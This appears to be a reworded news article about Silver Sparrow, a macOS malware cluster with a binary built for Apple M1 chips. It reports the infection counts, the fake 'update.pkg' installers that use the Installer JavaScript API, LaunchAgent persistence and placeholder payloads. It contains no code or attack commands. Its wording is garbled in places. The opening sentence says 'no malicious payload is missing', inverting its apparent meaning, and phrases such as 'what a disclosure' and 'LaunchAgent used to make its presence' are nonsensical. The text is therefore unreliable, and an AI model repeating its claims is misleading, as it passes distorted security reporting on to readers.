More malware has been discovered affecting Apple Silicon Macs, but researchers have found that no malicious payload is missing at this point.
It appears there may be more malware targeting Apple’s M1-based Macs than previously thought. After the initial reports of the first M1 malware found in the wild, it appears that there are more malware infections, but of a particularly toothless variety.
In early February, Red Canary researchers discovered a type of macOS malware that LaunchAgent used to make its presence, just like some other forms of malware. What was interesting to the researchers was that the malware behaved differently from typical adware because of the way JavaScript was used for execution.
The malware cluster, dubbed “Silver Sparrow” by the researchers, also included a binary file built to work with M1 chips. This made it malware that could potentially target Apple Silicon Macs.
Further research from researchers at VMware Carbon Black and Malwarebytes found that it was likely that Silver Sparrow was a “previously undetected malware species”. As of February 17, it was detected in 29,139 macOS endpoints in 153 countries, with the majority of infections in the US, UK, Canada, France, and Germany.
At the time of publication, the malware has not been used to deliver malicious payloads to victim’s Macs, although that may change in the future. Due to its compatibility with M1, the “relatively high infection rate” and the operational maturity of the malware, it was considered a threat that was serious enough and “uniquely positioned to deliver a potentially impactful payload in the blink of an eye”, what a disclosure.
Two versions of the malware were discovered, with one version’s payload consisting of a binary file affecting only Intel-based Macs, while the other was a binary file compiled for both Intel and M1 architectures . The payload is seemingly a placeholder as the first version opens a window that literally says “Hello, world!” and the second says, “You did it!”
![An example of the included binary file [via Red Canary]](https://i0.wp.com/photos5.appleinsider.com/gallery/40419-77860-image3-xl.jpg?w=560&ssl=1)
If it were malicious malware, the payload could potentially allow the same or similar payload statements to affect both architectures from a single executable.
The mechanism for the malware worked around files named “update.pkg” and “updater.pkg”, in the guise of installers. They use the macOS Installer JavaScript API to run the suspicious commands.
This is a behavior sometimes seen with legitimate software and not malware, which usually uses pre-installation or post-installation scripts for executing commands.
Once successful, the infection tries to check a specific URL for a downloadable file, which may contain further instructions or a final payload. After a week of monitoring the malware, no visible final payload was made available, which could change in the future.
Several questions have remained unanswered for the researchers about Silver Sparrow. These include where the original PKG files were used to infect systems, and elements of the malware code that appear to be part of a wider toolset.
“The ultimate goal of this malware is a mystery,” admits Red Canary. “We cannot know with certainty which payload is being distributed by the malware, whether a payload has already been delivered and removed, or whether the opponent has a future timeline for distribution.”
There is also the issue of including the “Hello World” executables, as the binary will not run unless a victim has actively searched for it and executed it, rather than running automatically. The executables suggest that this could be underdeveloped malware, or that an application bundle was needed to make the malware appear legitimate to other parties.